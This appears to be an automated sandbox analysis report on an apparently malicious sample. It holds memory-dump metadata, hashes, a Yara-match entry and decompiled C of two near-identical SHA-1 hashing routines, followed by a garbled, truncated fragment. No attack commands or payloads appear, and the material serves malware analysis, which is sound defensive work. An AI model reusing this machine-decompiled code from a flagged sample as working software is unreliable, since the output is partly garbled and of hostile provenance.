                                    0x006a6a1b
                                    0x00000000
                                    0x006a6a1b
                                    0x006a6a07
                                    0x006a6a00
                                    0x006a6987
                                    0x006a6987
                                    0x006a6989
                                    0x006a698f
                                    0x006a6991
                                    0x006a6997
                                    0x006a6999
                                    0x006a699c
                                    0x006a699e
                                    0x006a69a0
                                    0x006a69a2
                                    0x006a69a4
                                    0x006a69a6
                                    0x006a69a9
                                    0x006a69aa
                                    0x006a69ac
                                    0x006a69ae
                                    0x006a69b0
                                    0x006a69b2
                                    0x006a69b4
                                    0x006a69b5
                                    0x006a69b7
                                    0x006a69b9
                                    0x006a69bb
                                    0x006a69bc
                                    0x006a69c1
                                    0x006a6a1f
                                    0x006a6a1f
                                    0x006a69c3
                                    0x006a69c3
                                    0x00000000
                                    0x006a69c5
                                    0x006a69c1
                                    0x006a695d
                                    0x006a695d
                                    0x006a695f
                                    0x006a695f
                                    0x006a6962
                                    0x006a69c6
                                    0x006a69c6
                                    0x006a69c7
                                    0x006a69c8
                                    0x00000000
                                    0x006a6964
                                    0x006a6964
                                    0x006a6966
                                    0x006a6968
                                    0x006a6969
                                    0x006a696d
                                    0x006a6970
                                    0x006a6972
                                    0x006a6973
                                    0x006a6975
                                    0x006a6976
                                    0x006a697a
                                    0x006a697a
                                    0x006a697a
                                    0x006a6962
                                    0x006a695b
                                    0x006a68e6
                                    0x006a68e6
                                    0x006a68e8
                                    0x006a68eb
                                    0x006a68ed
                                    0x006a68ef
                                    0x006a68f1
                                    0x006a68f7
                                    0x006a68f9
                                    0x006a68fc
                                    0x006a68fe
                                    0x006a68ff
                                    0x006a6901
                                    0x006a6904
                                    0x006a6905
                                    0x006a6907
                                    0x00000000
                                    0x006a6907
                                    0x006a68e4
                                    0x006a683c
                                    0x006a683c
                                    0x00000000
                                    0x006a683e
                                    0x006a683a
                                    0x006a67d6
                                    0x006a67d6
                                    0x006a67d8
                                    0x006a67d8
                                    0x006a67db
                                    0x006a683f
                                    0x006a683f
                                    0x006a6840
                                    0x006a6841
                                    0x00000000
                                    0x006a67dd
                                    0x006a67dd
                                    0x006a67df
                                    0x006a67e1
                                    0x006a67e2
                                    0x006a67e4
                                    0x006a67e6
                                    0x006a67e9
                                    0x006a67eb
                                    0x006a67ec
                                    0x006a67ee
                                    0x006a67ef
                                    0x006a67f1
                                    0x00000000
                                    0x006a67f1
                                    0x006a67db
                                    0x006a67d4
                                    0x006a67cf
                                    0x006a6d18
                                    0x006a6d19
                                    0x006a6d1e
                                    0x006a6d7c
                                    0x006a6d7c
                                    0x006a6d7d
                                    0x006a6d82
                                    0x006a6d84
                                    0x006a6d86
                                    0x006a6d89
                                    0x006a6d8b

                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765744750.00000000006A2000.00000002.00020000.sdmp, Offset: 006A0000, based on PE: true
                                    • Associated: 00000007.00000002.765720003.00000000006A0000.00000002.00020000.sdmp
                                    • Associated: 00000007.00000002.766354813.0000000000792000.00000002.00020000.sdmp
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d292bed960a06bea762b1b291b0f6078c40eabc9ea435c021bd55608cf60a01b
                                    • Instruction ID: 237b509116203dc32a5806c59794309ab986ccbb44411ef6a6c46a6d1a15f44a
                                    • Opcode Fuzzy Hash: d292bed960a06bea762b1b291b0f6078c40eabc9ea435c021bd55608cf60a01b
                                    • Instruction Fuzzy Hash: 28E2375144E7C24FCB03AB785C712D1BF72AE5322475E95C7C4C08F4A3EA19599AEB32
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 73%
                                    			E00409E40(signed int* _a4) {
                                    				signed int _v8;
                                    				signed int _v12;
                                    				signed int _v16;
                                    				char _v304;
                                    				signed char* _t277;
                                    				signed int* _t278;
                                    				signed int _t279;
                                    				signed int _t285;
                                    				signed int _t288;
                                    				signed int _t292;
                                    				signed int _t295;
                                    				signed int _t299;
                                    				signed int _t303;
                                    				signed int _t305;
                                    				signed int _t311;
                                    				signed int _t318;
                                    				signed int _t320;
                                    				signed int _t323;
                                    				signed int _t325;
                                    				signed int _t334;
                                    				signed int _t340;
                                    				signed int _t341;
                                    				signed int _t346;
                                    				signed int _t353;
                                    				signed int _t357;
                                    				signed int _t358;
                                    				signed int _t362;
                                    				signed int _t365;
                                    				signed int _t369;
                                    				signed int _t370;
                                    				signed int _t399;
                                    				signed int _t404;
                                    				signed int _t410;
                                    				signed int _t413;
                                    				signed int _t420;
                                    				signed int _t423;
                                    				signed int _t432;
                                    				signed int _t434;
                                    				signed int _t437;
                                    				signed int _t445;
                                    				signed int _t459;
                                    				signed int _t462;
                                    				signed int _t463;
                                    				signed int _t464;
                                    				signed int _t470;
                                    				signed int _t478;
                                    				signed int _t479;
                                    				signed int* _t480;
                                    				signed int* _t481;
                                    				signed int _t488;
                                    				signed int _t491;
                                    				signed int _t496;
                                    				signed int _t499;
                                    				signed int _t502;
                                    				signed int _t505;
                                    				signed int _t506;
                                    				signed int _t510;
                                    				signed int _t522;
                                    				signed int _t525;
                                    				signed int _t532;
                                    				void* _t536;
                                    
                                    				_t481 = _a4;
                                    				_t353 = 0;
                                    				_t2 =  &(_t481[7]); // 0x1b
                                    				_t277 = _t2;
                                    				do {
                                    					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
                                    					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
                                    					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
                                    					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
                                    					_t353 = _t353 + 4;
                                    					_t277 =  &(_t277[0x10]);
                                    				} while (_t353 < 0x10);
                                    				_t278 =  &_v304;
                                    				_v8 = 0x10;
                                    				do {
                                    					_t399 =  *(_t278 - 0x18);
                                    					_t459 =  *(_t278 - 0x14);
                                    					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
                                    					asm("rol ecx, 1");
                                    					asm("rol ebx, 1");
                                    					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
                                    					_t278[8] = _t357;
                                    					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
                                    					_t278 =  &(_t278[4]);
                                    					asm("rol ebx, 1");
                                    					asm("rol edx, 1");
                                    					_t46 =  &_v8;
                                    					 *_t46 = _v8 - 1;
                                    					_t278[6] = _t318 ^ _t399;
                                    					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
                                    				} while ( *_t46 != 0);
                                    				_t320 =  *_t481;
                                    				_t279 = _t481[1];
                                    				_t358 = _t481[2];
                                    				_t404 = _t481[3];
                                    				_v12 = _t320;
                                    				_v16 = _t481[4];
                                    				_v8 = 0;
                                    				do {
                                    					asm("rol ebx, 0x5");
                                    					_t462 = _v8;
                                    					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
                                    					_t323 = _v12;
                                    					asm("ror eax, 0x2");
                                    					_v16 = _t404;
                                    					_v12 = _t488;
                                    					asm("rol esi, 0x5");
                                    					_v8 = _t358;
                                    					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
                                    					_t491 = _t279;
                                    					asm("ror ebx, 0x2");
                                    					_v16 = _v8;
                                    					_t362 = _v12;
                                    					_v8 = _t323;
                                    					_t325 = _v8;
                                    					_v12 = _t410;
                                    					asm("rol edx, 0x5");
                                    					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
                                    					_t413 = _v12;
                                    					_v16 = _t491;
                                    					asm("ror ecx, 0x2");
                                    					_v8 = _t362;
                                    					_v12 = _t285;
                                    					asm("rol eax, 0x5");
                                    					_v16 = _t325;
                                    					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
                                    					_t358 = _v12;
                                    					_t288 = _v8;
                                    					asm("ror edx, 0x2");
                                    					_v8 = _t413;
                                    					_v12 = _t496;
                                    					asm("rol esi, 0x5");
                                    					_v16 = _t288;
                                    					_t279 = _v12;
                                    					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
                                    					_t404 = _v8;
                                    					asm("ror ecx, 0x2");
                                    					_t463 = _t462 + 5;
                                    					_t320 = _t499;
                                    					_v12 = _t320;
                                    					_v8 = _t463;
                                    				} while (_t463 < 0x14);
                                    				_t464 = 0x14;
                                    				do {
                                    					asm("rol esi, 0x5");
                                    					asm("ror eax, 0x2");
                                    					_v16 = _t404;
                                    					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
                                    					_t334 = _v12;
                                    					_v12 = _t502;
                                    					asm("rol esi, 0x5");
                                    					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
                                    					asm("ror ebx, 0x2");
                                    					_t505 = _t279;
                                    					_v16 = _t358;
                                    					_t365 = _v12;
                                    					_v12 = _t420;
                                    					asm("rol edx, 0x5");
                                    					asm("ror ecx, 0x2");
                                    					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
                                    					_t423 = _v12;
                                    					_v8 = _t334;
                                    					_v8 = _t365;
                                    					_v12 = _t292;
                                    					asm("rol eax, 0x5");
                                    					_t464 = _t464 + 5;
                                    					_t358 = _v12;
                                    					asm("ror edx, 0x2");
                                    					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
                                    					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
                                    					_t295 = _v8;
                                    					_v8 = _t423;
                                    					_v12 = _t506;
                                    					asm("rol esi, 0x5");
                                    					_t404 = _v8;
                                    					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
                                    					_v16 = _t295;
                                    					_t279 = _v12;
                                    					asm("ror ecx, 0x2");
                                    					_v12 = _t499;
                                    				} while (_t464 < 0x28);
                                    				_v8 = 0x28;
                                    				do {
                                    					asm("rol esi, 0x5");
                                    					_v16 = _t404;
                                    					asm("ror eax, 0x2");
                                    					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
                                    					_t470 = _v12;
                                    					_v12 = _t510;
                                    					asm("rol esi, 0x5");
                                    					_t340 = _v8;
                                    					asm("ror edi, 0x2");
                                    					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
                                    					_v16 = _t358;
                                    					_t369 = _v12;
                                    					_v12 = _t432;
                                    					asm("rol edx, 0x5");
                                    					_v8 = _t279;
                                    					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
                                    					asm("ror ecx, 0x2");
                                    					_v16 = _v8;
                                    					_t299 = _v12;
                                    					_v8 = _t470;
                                    					_v12 = _t434;
                                    					asm("rol edx, 0x5");
                                    					asm("ror eax, 0x2");
                                    					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
                                    					_v16 = _v8;
                                    					_t437 = _t369;
                                    					_t358 = _v12;
                                    					_v8 = _t437;
                                    					_v12 = _t522;
                                    					asm("rol esi, 0x5");
                                    					_v16 = _v8;
                                    					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
                                    					_t404 = _t299;
                                    					_t279 = _v12;
                                    					asm("ror ecx, 0x2");
                                    					_v12 = _t499;
                                    					_t341 = _t340 + 5;
                                    					_v8 = _t341;
                                    				} while (_t341 < 0x3c);
                                    				_t478 = 0x3c;
                                    				_v8 = 0x3c;
                                    				do {
                                    					asm("rol esi, 0x5");
                                    					_t479 = _v8;
                                    					asm("ror eax, 0x2");
                                    					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
                                    					_t346 = _v12;
                                    					_v16 = _t404;
                                    					_v12 = _t525;
                                    					asm("rol esi, 0x5");
                                    					asm("ror ebx, 0x2");
                                    					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
                                    					_v16 = _t358;
                                    					_t370 = _v12;
                                    					_v12 = _t445;
                                    					asm("rol edx, 0x5");
                                    					_v16 = _t279;
                                    					asm("ror ecx, 0x2");
                                    					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
                                    					_t404 = _v12;
                                    					_v12 = _t303;
                                    					asm("rol eax, 0x5");
                                    					_v16 = _t346;
                                    					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
                                    					_t305 = _t370;
                                    					_v8 = _t346;
                                    					asm("ror edx, 0x2");
                                    					_v8 = _t370;
                                    					_t358 = _v12;
                                    					_v12 = _t532;
                                    					asm("rol esi, 0x5");
                                    					_t478 = _t479 + 5;
                                    					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
                                    					_v16 = _t305;
                                    					_t279 = _v12;
                                    					asm("ror ecx, 0x2");
                                    					_v8 = _t404;
                                    					_v12 = _t499;
                                    					_v8 = _t478;
                                    				} while (_t478 < 0x50);
                                    				_t480 = _a4;
                                    				_t480[2] = _t480[2] + _t358;
                                    				_t480[3] = _t480[3] + _t404;
                                    				_t311 = _t480[4] + _v16;
                                    				 *_t480 =  *_t480 + _t499;
                                    				_t480[1] = _t480[1] + _t279;
                                    				_t480[4] = _t311;
                                    				_t480[0x17] = 0;
                                    				return _t311;
                                    			}


                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: (
                                    • API String ID: 0-3887548279
                                    • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                    • Instruction ID: 761c4a68b585b28a38f9816625c1c2cc86ae2b6e7acc08c6d3f539b6cea400a7
                                    • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                    • Instruction Fuzzy Hash: 6C022CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 73%
                                    			E00409E3C(void* __eax, signed int* _a4) {
                                    				signed int _v8;
                                    				signed int _v12;
                                    				signed int _v16;
                                    				char _v304;
                                    				signed char* _t282;
                                    				signed int* _t283;
                                    				signed int _t284;
                                    				signed int _t290;
                                    				signed int _t293;
                                    				signed int _t297;
                                    				signed int _t300;
                                    				signed int _t304;
                                    				signed int _t308;
                                    				signed int _t310;
                                    				signed int _t316;
                                    				signed int _t324;
                                    				signed int _t326;
                                    				signed int _t329;
                                    				signed int _t331;
                                    				signed int _t340;
                                    				signed int _t346;
                                    				signed int _t347;
                                    				signed int _t352;
                                    				signed int _t360;
                                    				signed int _t364;
                                    				signed int _t365;
                                    				signed int _t369;
                                    				signed int _t372;
                                    				signed int _t376;
                                    				signed int _t377;
                                    				signed int _t407;
                                    				signed int _t412;
                                    				signed int _t418;
                                    				signed int _t421;
                                    				signed int _t428;
                                    				signed int _t431;
                                    				signed int _t440;
                                    				signed int _t442;
                                    				signed int _t445;
                                    				signed int _t453;
                                    				signed int _t468;
                                    				signed int _t471;
                                    				signed int _t472;
                                    				signed int _t473;
                                    				signed int _t479;
                                    				signed int _t487;
                                    				signed int _t488;
                                    				signed int* _t489;
                                    				signed int* _t492;
                                    				signed int _t499;
                                    				signed int _t502;
                                    				signed int _t507;
                                    				signed int _t510;
                                    				signed int _t513;
                                    				signed int _t516;
                                    				signed int _t517;
                                    				signed int _t521;
                                    				signed int _t533;
                                    				signed int _t536;
                                    				signed int _t543;
                                    				void* _t549;
                                    				void* _t551;
                                    
                                    				_t549 = _t551;
                                    				_t492 = _a4;
                                    				_t360 = 0;
                                    				_t5 =  &(_t492[7]); // 0x1b
                                    				_t282 = _t5;
                                    				do {
                                    					 *(_t549 + _t360 * 4 - 0x14c) = ((( *(_t282 - 1) & 0x000000ff) << 0x00000008 |  *_t282 & 0x000000ff) << 0x00000008 | _t282[1] & 0x000000ff) << 0x00000008 | _t282[2] & 0x000000ff;
                                    					 *(_t549 + _t360 * 4 - 0x148) = (((_t282[3] & 0x000000ff) << 0x00000008 | _t282[4] & 0x000000ff) << 0x00000008 | _t282[5] & 0x000000ff) << 0x00000008 | _t282[6] & 0x000000ff;
                                    					 *(_t549 + _t360 * 4 - 0x144) = (((_t282[7] & 0x000000ff) << 0x00000008 | _t282[8] & 0x000000ff) << 0x00000008 | _t282[9] & 0x000000ff) << 0x00000008 | _t282[0xa] & 0x000000ff;
                                    					 *(_t549 + _t360 * 4 - 0x140) = (((_t282[0xb] & 0x000000ff) << 0x00000008 | _t282[0xc] & 0x000000ff) << 0x00000008 | _t282[0xd] & 0x000000ff) << 0x00000008 | _t282[0xe] & 0x000000ff;
                                    					_t360 = _t360 + 4;
                                    					_t282 =  &(_t282[0x10]);
                                    				} while (_t360 < 0x10);
                                    				_t283 =  &_v304;
                                    				_v8 = 0x10;
                                    				do {
                                    					_t407 =  *(_t283 - 0x18);
                                    					_t468 =  *(_t283 - 0x14);
                                    					_t364 =  *(_t283 - 0x20) ^ _t283[5] ^  *_t283 ^ _t407;
                                    					asm("rol ecx, 1");
                                    					asm("rol ebx, 1");
                                    					_t283[9] =  *(_t283 - 0x1c) ^ _t283[6] ^ _t283[1] ^ _t468;
                                    					_t283[8] = _t364;
                                    					_t324 = _t283[7] ^  *(_t283 - 0x10) ^ _t283[2];
                                    					_t283 =  &(_t283[4]);
                                    					asm("rol ebx, 1");
                                    					asm("rol edx, 1");
                                    					_t49 =  &_v8;
                                    					 *_t49 = _v8 - 1;
                                    					_t283[6] = _t324 ^ _t407;
                                    					_t283[7] =  *(_t283 - 0x1c) ^  *(_t283 - 4) ^ _t364 ^ _t468;
                                    				} while ( *_t49 != 0);
                                    				_t326 =  *_t492;
                                    				_t284 = _t492[1];
                                    				_t365 = _t492[2];
                                    				_t412 = _t492[3];
                                    				_v12 = _t326;
                                    				_v16 = _t492[4];
                                    				_v8 = 0;
                                    				do {
                                    					asm("rol ebx, 0x5");
                                    					_t471 = _v8;
                                    					_t499 = _t326 + ( !_t284 & _t412 | _t365 & _t284) +  *((intOrPtr*)(_t549 + _t471 * 4 - 0x14c)) + _v16 + 0x5a827999;
                                    					_t329 = _v12;
                                    					asm("ror eax, 0x2");
                                    					_v16 = _t412;
                                    					_v12 = _t499;
                                    					asm("rol esi, 0x5");
                                    					_v8 = _t365;
                                    					_t418 = _t499 + ( !_t329 & _t365 | _t284 & _t329) +  *((intOrPtr*)(_t549 + _t471 * 4 - 0x148)) + _v16 + 0x5a827999;
                                    					_t502 = _t284;
                                    					asm("ror ebx, 0x2");
                                    					_v16 = _v8;
                                    					_t369 = _v12;
                                    					_v8 = _t329;
                                    					_t331 = _v8;
                                    					_v12 = _t418;
                                    					asm("rol edx, 0x5");
                                    					_t290 = _t418 + ( !_t369 & _t502 | _t329 & _t369) +  *((intOrPtr*)(_t549 + _t471 * 4 - 0x144)) + _v16 + 0x5a827999;
                                    					_t421 = _v12;
                                    					_v16 = _t502;
                                    					asm("ror ecx, 0x2");
                                    					_v8 = _t369;
                                    					_v12 = _t290;
                                    					asm("rol eax, 0x5");
                                    					_v16 = _t331;
                                    					_t507 = _t290 + ( !_t421 & _t331 | _t369 & _t421) +  *((intOrPtr*)(_t549 + _t471 * 4 - 0x140)) + _v16 + 0x5a827999;
                                    					_t365 = _v12;
                                    					_t293 = _v8;
                                    					asm("ror edx, 0x2");
                                    					_v8 = _t421;
                                    					_v12 = _t507;
                                    					asm("rol esi, 0x5");
                                    					_v16 = _t293;
                                    					_t284 = _v12;
                                    					_t510 = _t507 + ( !_t365 & _t293 | _t421 & _t365) +  *((intOrPtr*)(_t549 + _t471 * 4 - 0x13c)) + _v16 + 0x5a827999;
                                    					_t412 = _v8;
                                    					asm("ror ecx, 0x2");
                                    					_t472 = _t471 + 5;
                                    					_t326 = _t510;
                                    					_v12 = _t326;
                                    					_v8 = _t472;
                                    				} while (_t472 < 0x14);
                                    				_t473 = 0x14;
                                    				do {
                                    					asm("rol esi, 0x5");
                                    					asm("ror eax, 0x2");
                                    					_v16 = _t412;
                                    					_t513 = _t510 + (_t412 ^ _t365 ^ _t284) +  *((intOrPtr*)(_t549 + _t473 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
                                    					_t340 = _v12;
                                    					_v12 = _t513;
                                    					asm("rol esi, 0x5");
                                    					_t428 = _t513 + (_t365 ^ _t284 ^ _t340) +  *((intOrPtr*)(_t549 + _t473 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
                                    					asm("ror ebx, 0x2");
                                    					_t516 = _t284;
                                    					_v16 = _t365;
                                    					_t372 = _v12;
                                    					_v12 = _t428;
                                    					asm("rol edx, 0x5");
                                    					asm("ror ecx, 0x2");
                                    					_t297 = _t428 + (_t284 ^ _t340 ^ _t372) +  *((intOrPtr*)(_t549 + _t473 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
                                    					_t431 = _v12;
                                    					_v8 = _t340;
                                    					_v8 = _t372;
                                    					_v12 = _t297;
                                    					asm("rol eax, 0x5");
                                    					_t473 = _t473 + 5;
                                    					_t365 = _v12;
                                    					asm("ror edx, 0x2");
                                    					_t149 = _t516 + 0x6ed9eba1; // 0x6ed9eb9f
                                    					_t517 = _t297 + (_t340 ^ _v8 ^ _t431) +  *((intOrPtr*)(_t549 + _t473 * 4 - 0x154)) + _t149;
                                    					_t300 = _v8;
                                    					_v8 = _t431;
                                    					_v12 = _t517;
                                    					asm("rol esi, 0x5");
                                    					_t412 = _v8;
                                    					_t510 = _t517 + (_t300 ^ _v8 ^ _t365) +  *((intOrPtr*)(_t549 + _t473 * 4 - 0x150)) + _t340 + 0x6ed9eba1;
                                    					_v16 = _t300;
                                    					_t284 = _v12;
                                    					asm("ror ecx, 0x2");
                                    					_v12 = _t510;
                                    				} while (_t473 < 0x28);
                                    				_v8 = 0x28;
                                    				do {
                                    					asm("rol esi, 0x5");
                                    					_v16 = _t412;
                                    					asm("ror eax, 0x2");
                                    					_t521 = ((_t365 | _t284) & _t412 | _t365 & _t284) +  *((intOrPtr*)(_t549 + _v8 * 4 - 0x14c)) + _t510 + _v16 - 0x70e44324;
                                    					_t479 = _v12;
                                    					_v12 = _t521;
                                    					asm("rol esi, 0x5");
                                    					_t346 = _v8;
                                    					asm("ror edi, 0x2");
                                    					_t440 = ((_t284 | _t479) & _t365 | _t284 & _t479) +  *((intOrPtr*)(_t549 + _t346 * 4 - 0x148)) + _t521 + _v16 - 0x70e44324;
                                    					_v16 = _t365;
                                    					_t376 = _v12;
                                    					_v12 = _t440;
                                    					asm("rol edx, 0x5");
                                    					_v8 = _t284;
                                    					_t442 = ((_t479 | _t376) & _t284 | _t479 & _t376) +  *((intOrPtr*)(_t549 + _t346 * 4 - 0x144)) + _t440 + _v16 - 0x70e44324;
                                    					asm("ror ecx, 0x2");
                                    					_v16 = _v8;
                                    					_t304 = _v12;
                                    					_v8 = _t479;
                                    					_v12 = _t442;
                                    					asm("rol edx, 0x5");
                                    					asm("ror eax, 0x2");
                                    					_t533 = ((_t376 | _t304) & _t479 | _t376 & _t304) +  *((intOrPtr*)(_t549 + _t346 * 4 - 0x140)) + _t442 + _v16 - 0x70e44324;
                                    					_v16 = _v8;
                                    					_t445 = _t376;
                                    					_t365 = _v12;
                                    					_v8 = _t445;
                                    					_v12 = _t533;
                                    					asm("rol esi, 0x5");
                                    					_v16 = _v8;
                                    					_t510 = ((_t304 | _t365) & _t445 | _t304 & _t365) +  *((intOrPtr*)(_t549 + _t346 * 4 - 0x13c)) + _t533 + _v16 - 0x70e44324;
                                    					_t412 = _t304;
                                    					_t284 = _v12;
                                    					asm("ror ecx, 0x2");
                                    					_v12 = _t510;
                                    					_t347 = _t346 + 5;
                                    					_v8 = _t347;
                                    				} while (_t347 < 0x3c);
                                    				_t487 = 0x3c;
                                    				_v8 = 0x3c;
                                    				do {
                                    					asm("rol esi, 0x5");
                                    					_t488 = _v8;
                                    					asm("ror eax, 0x2");
                                    					_t536 = (_t412 ^ _t365 ^ _t284) +  *((intOrPtr*)(_t549 + _t487 * 4 - 0x14c)) + _t510 + _v16 - 0x359d3e2a;
                                    					_t352 = _v12;
                                    					_v16 = _t412;
                                    					_v12 = _t536;
                                    					asm("rol esi, 0x5");
                                    					asm("ror ebx, 0x2");
                                    					_t453 = (_t365 ^ _t284 ^ _t352) +  *((intOrPtr*)(_t549 + _t488 * 4 - 0x148)) + _t536 + _v16 - 0x359d3e2a;
                                    					_v16 = _t365;
                                    					_t377 = _v12;
                                    					_v12 = _t453;
                                    					asm("rol edx, 0x5");
                                    					_v16 = _t284;
                                    					asm("ror ecx, 0x2");
                                    					_t308 = (_t284 ^ _t352 ^ _t377) +  *((intOrPtr*)(_t549 + _t488 * 4 - 0x144)) + _t453 + _v16 - 0x359d3e2a;
                                    					_t412 = _v12;
                                    					_v12 = _t308;
                                    					asm("rol eax, 0x5");
                                    					_v16 = _t352;
                                    					_t543 = (_t352 ^ _t377 ^ _t412) +  *((intOrPtr*)(_t549 + _t488 * 4 - 0x140)) + _t308 + _v16 - 0x359d3e2a;
                                    					_t310 = _t377;
                                    					_v8 = _t352;
                                    					asm("ror edx, 0x2");
                                    					_v8 = _t377;
                                    					_t365 = _v12;
                                    					_v12 = _t543;
                                    					asm("rol esi, 0x5");
                                    					_t487 = _t488 + 5;
                                    					_t510 = (_t310 ^ _t412 ^ _t365) +  *((intOrPtr*)(_t549 + _t488 * 4 - 0x13c)) + _t543 + _v16 - 0x359d3e2a;
                                    					_v16 = _t310;
                                    					_t284 = _v12;
                                    					asm("ror ecx, 0x2");
                                    					_v8 = _t412;
                                    					_v12 = _t510;
                                    					_v8 = _t487;
                                    				} while (_t487 < 0x50);
                                    				_t489 = _a4;
                                    				_t489[2] = _t489[2] + _t365;
                                    				_t489[3] = _t489[3] + _t412;
                                    				_t316 = _t489[4] + _v16;
                                    				 *_t489 =  *_t489 + _t510;
                                    				_t489[1] = _t489[1] + _t284;
                                    				_t489[4] = _t316;
                                    				_t489[0x17] = 0;
                                    				return _t316;
                                    			}

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: (
                                    • API String ID: 0-3887548279
                                    • Opcode ID: 49610e05aef350d710da37f1abe264cb26659ea830e28cfeafb0a386cf071ac3
                                    • Instruction ID: 749f1f7fbe95814f77f12d63ba111dd9e14d87e5667683efdd12a01bcbcf9987
                                    • Opcode Fuzzy Hash: 49610e05aef350d710da37f1abe264cb26659ea830e28cfeafb0a386cf071ac3
                                    • Instruction Fuzzy Hash: F6021CB6E006199FDB14CF9AC8805DDFBF2FF88314F1AC1AAD849A7355D6746A418F80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 42%
                                    			E0041D9D8(signed int __eax, void* __ebx, signed int __ecx, void* __edx, void* __edi) {
                                    				signed int _t55;
                                    				signed char _t56;
                                    				signed int _t68;
                                    				char _t74;
                                    				signed int _t75;
                                    				signed int _t80;
                                    				void* _t90;
                                    				signed int _t96;
                                    				signed int _t100;
                                    				signed int _t101;
                                    				intOrPtr _t104;
                                    
                                    				_t101 = _t100 ^  *0x30341ea3;
                                    				_pop( *0x5a277811);
